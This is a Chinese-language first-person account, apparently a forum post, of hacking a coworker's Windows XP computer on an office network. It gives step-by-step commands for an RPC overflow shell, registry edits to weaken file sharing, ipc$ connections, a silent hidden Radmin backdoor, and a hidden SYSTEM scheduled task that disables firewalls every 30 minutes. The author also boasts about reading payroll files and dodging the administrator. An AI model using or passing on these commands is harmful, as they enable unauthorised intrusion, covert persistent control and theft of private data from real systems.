|
我先打開命令提示符,用 ping 命令去ping 它,Reply from 192.168.16.4: bytes=32 time<1ms
TTL=128,說明對方?jīng)]有防火墻,這樣或許有可能入侵。下一步,我使用了X-SCAN
3.2對它進(jìn)行了詳細(xì)掃描,對方電腦的操作系統(tǒng)是XP,大家知道XP系統(tǒng)是相當(dāng)安全的,在一些黑客論壇討論的關(guān)于入侵XP的話題也是比較多的,入侵這樣的系統(tǒng)方法只有兩種,一是采用釣魚的方法,這是一種被動的方式讓對方中木馬來控制它。第二種方法就是如果對方有比較嚴(yán)重的漏洞,如RPC溢出。這樣的話,用溢出程序溢出它,然后再上傳控制程序進(jìn)行控制。掃描結(jié)果確實(shí)讓我高興了一陣,對方電腦有大量的漏洞,其中一個比較有名的就是沖擊波利用的RPC漏洞,這個漏洞相當(dāng)出名了,03年的時候曾席卷全球。知道了它有這個漏洞,下一步就要找溢出程序,這讓我忙活了好一陣時間,因?yàn)橛械囊绯龀绦驅(qū)@臺電腦好像無效。這些工具的名稱我都記不起來了,反正有好幾個。最后找到了一個溢出程序XP.EXE,這個程序終于溢出了那臺電腦。得到了個CMDSHELL。這算是一個小小的勝利吧。 得到了CMDSHELL,我該怎樣給它上傳控制程序呢?我想了一會兒,終于靈感來了,我和它在一個局域網(wǎng),用共享上傳最方便了。于是打開網(wǎng)上鄰居,查看工作組計(jì)算機(jī),找到這臺電腦,雙擊,進(jìn)不去,提示信息我記不清了,據(jù)我分析可能是對方這臺電腦沒有運(yùn)行網(wǎng)絡(luò)安裝向?qū)В驗(yàn)槭荴P系統(tǒng),所以要用共享傳輸文件,必須要運(yùn)行這個向?qū)Р豢桑\(yùn)行這個向?qū)ё饔镁褪桥渲靡粋€本地安全策略,你可以打開“控制面板—管理工具—本地安全策略”,展開“本地策略”—“用戶權(quán)利指派”。在右邊有一個安全策略—“拒絕從網(wǎng)絡(luò)訪問這臺計(jì)算機(jī)”。我想對方的電腦中相應(yīng)的這條策略里,肯定設(shè)置有GUEST這個用戶的,這就是為什么我打不開它的共享的原因,因?yàn)楣蚕碓L問默認(rèn)是以這個GEUST用戶登錄的,因?yàn)樗陌踩O(shè)置不允許GUEST從網(wǎng)絡(luò)訪問,所以我才訪問不了它的共享。因?yàn)閄P 默認(rèn)的共享模式是簡單文件共享。這與WIN2000系統(tǒng)不同,如果是WIN2000系統(tǒng),你在知道管理員密碼的情況下,可以用命令net use IPipc$ "密碼" /user:用戶名 建立與對方的ipc$連接,隨之而來的就是copy 木馬程序 ipd$這樣的命令上傳木馬了。XP就不能這樣子了,你即使知道它的管理員密碼用上面的命令與不能建立ipc$連接。這就是為什么XP比2000系統(tǒng)安全的地方所在。下面我要作的就是要修改XP的共享模式為2000的共享模式。方法如下:在溢出獲得的CMDSHELL下,鍵入命令: echo Windows Registry Editor Version 5.00 >c:123.reg echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>c:123.reg echo. >>c:123.reg echo "forceguest"=dword:00000000 >>c:123.reg regedit /e c:123.reg 等打完這幾條命令后,對方XP的共享模式就已經(jīng)與2000的相同了。我來解釋一下這幾條命令的含意,echo Windows Registry Editor Version 5.00 >c:123.reg這條命令是將Windows Registry Editor Version 5.00這幾個字符保存到c:123.reg文件里。大家需要注意一下第一句的> 和后面幾句的>>這是有區(qū)別的,>字符是覆蓋式的,>>是追加式的,第三句的echo. >>c:123.reg命令是追加一個空白行,這句挺重要,如果不加這句是不能成功的,你可以隨便打開一個注冊表文件看一下,格式就是這樣的,第二行是空著的。這一點(diǎn)一定要注意。執(zhí)行完前四條命令后就在對方C盤下生成一個123.reg文件,內(nèi)容如下: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] "forceguest"=dword:00000000 第五條命令是將這個REG文件導(dǎo)入到注冊表中。這樣執(zhí)行完這五條命令后,我就可以像操作2000系統(tǒng)一樣去用ipc$控制了。下一步,上傳控制程序。我選擇的是RADMIN2.0的服務(wù)程序,有人問這個安裝需要到圖形界面下,我說不用這么費(fèi)事,在CMDSHELL下一樣可以安裝。安裝前我們需要先準(zhǔn)備一下,首先生成一個REG文件,文件名:aaa.reg 內(nèi)容如下: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESYSTEMRAdminv2.0ServerParameters] "DisableTrayIcon"=hex:01,00,00,00 作用就是使生成的服務(wù)端程序能夠隱藏通知欄里的圖標(biāo),我們都知道正常安裝RADMIN服務(wù)端程序后,在通知欄里是有一個小圖標(biāo)的,我們要入侵人家,當(dāng)然要把這個小圖標(biāo)去掉,不然是會被發(fā)現(xiàn)的。接著生成一個BAT文件,我命名為aaa.bat,內(nèi)容如下: r_server /install /silence r_server.exe /port:2233 /pass:1 /save /silence regedit.exe /s aaa.reg net start r_server 這些命令是安裝命令,設(shè)置連接端口為:2233 密碼是:1 隱藏安裝界面的方式安裝 然后就是將aaa.reg導(dǎo)入注冊表,啟動r_server服務(wù)。 準(zhǔn)備工作作好后,就要上傳文件了,一共需上傳4個文件,aaa.reg aaa.bat r_server.exe admdll.dll 后兩個文件是RADMIN安裝目錄下的,在安裝了RADMIN2.0客戶端后,安裝目錄里就有這兩個文件。我先建立ipc$連接 net use 192.168.16.4ipc$ "" /user:administrator 提示:命令成功完成。接著: copy r_server 192.168.1.4admin$system32 copy aaa.bat 192.168.1.4admin$system32 copy aaa.reg 192.168.1.4admin$system32 copy admdll.dll 192.168.1.4admin$system32 然后再進(jìn)入溢出得到的CMDSHELL下鍵入: attrib +s +h +r c:windowssystem32r_server.exe attrib +s +h +r c:windowssystem32admdll.exe attrib +s +h +r c:windowssystem32aaa.bat attrib +s +h +r c:windowssystem32aaa.reg 這些命令是將這4個文件設(shè)置成系統(tǒng)隱藏只讀文件,不容易被對方管理員發(fā)現(xiàn)。 下一步就是運(yùn)行aaa.bat了,就這么簡單,運(yùn)行成功后,我用radmin2.0客戶端設(shè)置了一下連接參數(shù),端口改成2233,連接成功,密碼是1,成功地看到了對方的屏幕。呵呵,成功了,從有入侵的想法到入侵成功進(jìn)行控制,只用了短短的4天時間。 進(jìn)入后看到對方電腦上正在玩QQ?;视螒颍贿^我也犯了個錯誤我給它新建了個管理用戶,原先是打算用于ipc$連接用的,可我上傳RADMIN控制后忘記刪掉了,我在溢出的CMDSHELL 下不小心鍵入了命令EXIT,結(jié)果對方電腦出現(xiàn)了倒計(jì)時關(guān)機(jī)的界面,我也沒有及時處理掉,我當(dāng)時要是用RADMIN的CMD功能,鍵入命令 shutdown -A就可以取消這個倒計(jì)時關(guān)機(jī)的界面,可當(dāng)時我也沒有及時處理,導(dǎo)致對方電腦重啟了,重啟后我估計(jì)對方管理員看到了我新建的用戶了,后來我用RADMIN 遠(yuǎn)程查看時,也覺得這個新建用戶太招搖了,用戶名就是ip$ ,圖標(biāo)是個大紅的花朵。 下午的時候我發(fā)現(xiàn)那臺電腦的管理員請了位高手來助陣了,因?yàn)槲覀冞@個局域網(wǎng)中的各臺電腦都通過我們辦公室里的那臺電腦連接到互聯(lián)網(wǎng)上,所以,那位高手先到我們辦公室電腦上查看了一番沒有發(fā)現(xiàn)問題后,他將原先安裝的江民換成了卡巴了,我估計(jì)他認(rèn)為攻擊是來自互聯(lián)網(wǎng)上,豈不知黑客就在他眼皮底下,嘿嘿。。。。那位高手又給被我控制了的電腦上安裝了卡巴,原先的殺毒軟件是諾頓,對WINDOWS也進(jìn)行了更新,可這些作法都晚了,因?yàn)槲乙呀?jīng)控制你了,再打補(bǔ)丁也無用了。經(jīng)過那位高手一番檢查與修補(bǔ)后,我的后門依然存在著,看來那位高手水平也不怎么樣。我給它開放的ipc$功能,他也沒發(fā)現(xiàn)。也許他只認(rèn)為是一次簡單的病毒攻擊,而掉以輕心了,而不知他的一舉一動都在我的監(jiān)視之下。哈哈。。。 接下來的工作對我來說就比較簡單了,給它開telnet服務(wù)器,開“遠(yuǎn)程桌面”這個我采用的是圖形的方式進(jìn)行操作的,中午下班后我等這臺計(jì)算機(jī)管理員走后,用RADMIN登錄進(jìn)去進(jìn)行了一些設(shè)置工作。后來也通過RADMIN的文件管理功能翻看了這臺電腦上的文件,有一些財(cái)務(wù)報(bào)表,工資表之類的東西,這些對我來看沒什么大的吸引力。不過我看到了我們集團(tuán)老總的工資,每月一萬多塊錢呢??!好黑啊。。。這么多,我工資只有區(qū)區(qū)幾百塊,真是太不公平了,憤憤不平中。。。。 后來一次通過RADMIN操作對方的電腦時不小心被管理員發(fā)現(xiàn)了,我想對方的管理員也很感到意外, windows的補(bǔ)丁打上了,還裝了強(qiáng)悍的卡巴,還是搞不定黑客??!哈哈,因?yàn)榭ò筒皇菤ADMIN的。后來對方那個管理員啟用了局域網(wǎng)“本地連接”中的防火墻功能,這樣我無法連接它的電腦了。因?yàn)镽ADMIN是正向連接的,所以在對方開防火墻的情況下是無法使用的。有一次下午下班后我無意地ping 了一下這臺電腦的IP,居然有返回。說明對方防火墻關(guān)閉了,我馬上用RADMIN連接,居然成功。我暈。。。原來對方只開了防火墻,并沒有發(fā)現(xiàn)這個明顯的后門。我想開防火墻也是那位電腦高手給搞的,依那個管理員的水平是想不到這個辦法的。不過telnet服務(wù)器給關(guān)閉了,3389遠(yuǎn)程桌面也給關(guān)了,共享模式也被修改回了原先的樣子??磥砟俏桓呤忠彩前l(fā)現(xiàn)了一些漏洞并補(bǔ)上了,但是那個后門,他卻沒有發(fā)現(xiàn),這就給我創(chuàng)造了第二次入侵的機(jī)會。他有政策我有對策,他可以開防火墻,我可以給他關(guān)掉,有人問要是再被管理員開啟了防火墻,那豈不是沒得玩了。哈哈。。。我下面給出一個我自己研究出來的獨(dú)門密方,保證百??!哈哈。。。。 我的方法是創(chuàng)建一個隱藏的計(jì)劃任務(wù)。讓這個計(jì)劃任務(wù)每隔半個小時殺除一遍防火墻,這樣即使對方管理員打開防火墻也起不了什么作用。方法如下:先建一個批處理文件abc.bat,放在c:windowssystem32目錄下,內(nèi)容如下: net stop sharedaccess 當(dāng)然也可以附加點(diǎn)別的,比如說你想半小時殺除一遍天網(wǎng)防火墻,可以再加上下面的命令: taskkill /IM rfw.exe /f 如果想使共享模式是高級共享模式,可以再加上下面的命令: regedit /e c:windowssystem32abc.reg 當(dāng)然這需要事先上傳一個abc.reg到它的c:windowssystem32目錄下,內(nèi)容如下: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] "forceguest"=dword:00000000 下面我說一下創(chuàng)建隱藏計(jì)劃任務(wù)的方法: 在對方電腦的CMDSHELL下鍵入命令: schtasks /create /tn "常駐" /tr c:windowssystem32abc.bat /sc minute /mo 30 /ru "system" 這樣就在對方電腦上建立了一個以SYSTEM權(quán)限運(yùn)行的計(jì)劃任務(wù),這個計(jì)劃任務(wù)每隔30分鐘運(yùn)行一次c: windowssystem32abc.bat,功能嘛,就是根據(jù)abc.bat里面的命令行決定了,可以說這個新發(fā)現(xiàn)是相當(dāng)厲害的,利用的巧妙,功能可以相當(dāng)強(qiáng)大。如果只有這樣還不能達(dá)到隱藏的要求,你打開控制面板—任務(wù)計(jì)劃,仍然可以發(fā)現(xiàn)它的存在。好的,下面說說隱藏它的方法。還是進(jìn)入 CMDSHELL中。鍵入命令attrib +h c:windowstasks常駐.job回車后,你再到控制面板的任務(wù)計(jì)劃中看一下是不是以前的任務(wù)消失了。這只是表面消失,實(shí)際是它還是存在的。你可以在CMDSHELL下鍵入命令:schtasks查看。這樣不管對方管理員怎樣修改設(shè)置,每隔半小時就又會補(bǔ)修改回來。它想擺脫我的控制可說是難上加難了。哈哈。。 |
|
|